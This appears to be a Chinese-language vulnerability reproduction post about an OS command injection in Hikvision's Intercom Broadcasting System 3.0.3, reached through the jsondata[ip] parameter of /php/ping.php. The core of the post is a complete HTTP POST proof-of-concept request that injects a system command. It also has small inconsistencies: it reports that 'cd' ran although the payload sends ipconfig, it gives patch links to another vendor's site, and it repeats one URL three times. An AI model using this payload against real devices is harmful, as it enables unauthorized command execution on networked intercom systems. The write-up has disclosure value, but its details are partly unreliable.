0x00写在前面

本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!

0x01漏洞介绍

Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。

Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。

0x02影响版本

Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)

0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

 POC (POST)

漏洞复现

POST /php/ping.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 43
Connection: close

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

成功执行cd命令

3.nuclei工具测试(漏洞存在)


0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://www.spon.com.cn/
https://www.cnnvd.org.cn/home/loopholehttps://www.cnnvd.org.cn/home/loopholehttps://www.cnnvd.org.cn/home/loophole